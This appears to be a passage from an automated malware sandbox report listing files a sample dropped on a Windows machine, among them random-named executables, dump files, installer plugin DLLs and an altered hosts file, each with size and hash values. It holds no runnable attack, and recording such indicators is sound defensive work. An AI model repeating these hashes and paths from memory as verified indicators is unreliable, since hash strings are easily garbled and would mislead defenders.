MD5 f3e4f1d5d70d4e5fa6f0a542f749651e
SHA1 eeb939f01938c7dd897c32675c79926113d29dad
SHA256 8fc6dfab0038cfedee6ab9b085683e6dc6b35dafc0727caa6dd9b1e59b4803db
SHA512 dd160ef3bf70dce8dd059654f618a31a56eff9f4ab5a87a6c4f3e72a3d3b9275cea415371c1e98e200ad4f0ebe82361f2a45357d92b5391bc3ee73679e96a703
-
C:\Windows\TEMP\gtuqsjqjh\4932.dmp
Filesize 8.6MB
MD5 208735557b8553b05a1533c4f6503416
SHA1 0b0c562241d3529893fe8e138aedf378a73a3dec
SHA256 f492f6f444ee89d59bd2a873c6cc5d06c54fcfaf5a81a303bbb7cf2c642d7828
SHA512 bd3301d54764a74302ca897a3adedf278964ec63d4829dc16a00c0c90f494616fd241816c2abbbdf6ddd826b8da4a946d19ddfc64aa70e33c55d19e868608c16
-
C:\Windows\TEMP\gtuqsjqjh\780.dmp
Filesize 1.9MB
MD5 fbaf25e27e0927d23b37ed252c64d3a4
SHA1 0d6b77bb5bec7d5d58feb94108621f40e438487d
SHA256 b0c43a3889d50e412e9f1e83f838842d86344000487680de95f67423eed3c5ce
SHA512 60b932067ae135bb13ed7257f53097995e0b30ed0e6ca85b96636c30952f7a8fc2fce41d28d61e52e9d3c096e6cad02fdcb7510b66e50b7c12039e5346918fde
-
C:\Windows\Temp\bvzeemvvy\gzbahn.exe
Filesize 343KB
MD5 2b4ac7b362261cb3f6f9583751708064
SHA1 b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256 a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512 c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
C:\Windows\Temp\gtuqsjqjh\vmebnmlbn.exe
Filesize 126KB
MD5 e8d45731654929413d79b3818d6a5011
SHA1 23579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256 a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512 df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
C:\Windows\Temp\nszA9CF.tmp\System.dll
Filesize 11KB
MD5 2ae993a2ffec0c137eb51c8832691bcb
SHA1 98e0b37b7c14890f8a599f35678af5e9435906e1
SHA256 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA512 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
C:\Windows\Temp\nszA9CF.tmp\nsExec.dll
Filesize 6KB
MD5 b648c78981c02c434d6a04d4422a6198
SHA1 74d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA256 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
C:\Windows\Temp\xohudmc.exe
Filesize 72KB
MD5 cbefa7108d0cf4186cdf3a82d6db80cd
SHA1 73aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA256 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512 b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
C:\Windows\gtuqsjqjh\Corporate\vfshost.exe
Filesize 381KB
MD5 fd5efccde59e94eec8bb2735aa577b2b
SHA1 51aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA512 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe
Filesize 332KB
MD5 ea774c81fe7b5d9708caa278cf3f3c68
SHA1 fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA256 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA512 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe
Filesize 424KB
MD5 e9c001647c67e12666f27f9984778ad6
SHA1 51961af0a52a2cc3ff2c4149f8d7011490051977
SHA256 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA512 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
C:\Windows\system32\drivers\etc\hosts
Filesize 1KB
MD5 c838e174298c403c2bbdf3cb4bdbb597
SHA1 70eeb7dfad9488f14351415800e67454e2b4b95b
SHA256 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512 c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
C:\Windows\tbzbbivf\simzbkl.exe
Filesize 8.6MB
MD5 76114eab6c0d3c5c5a2e068b4da7c321
SHA1 7fbb2121c81c159683e0deb12e14bd13a0274549
SHA256 3a0bb06d307d96e8fa00248971e3a6ff0b3d0925acdc934477c838c097acb499
SHA512 e2d3c0bdccb0bd8ec9f8b61466568e99efe5199c7c988dd7daa9dfe50ca2c46735f86f17609f54eb79f8bb70a36be44c1e308ca642c9d5078f8d9fd049e1da52
-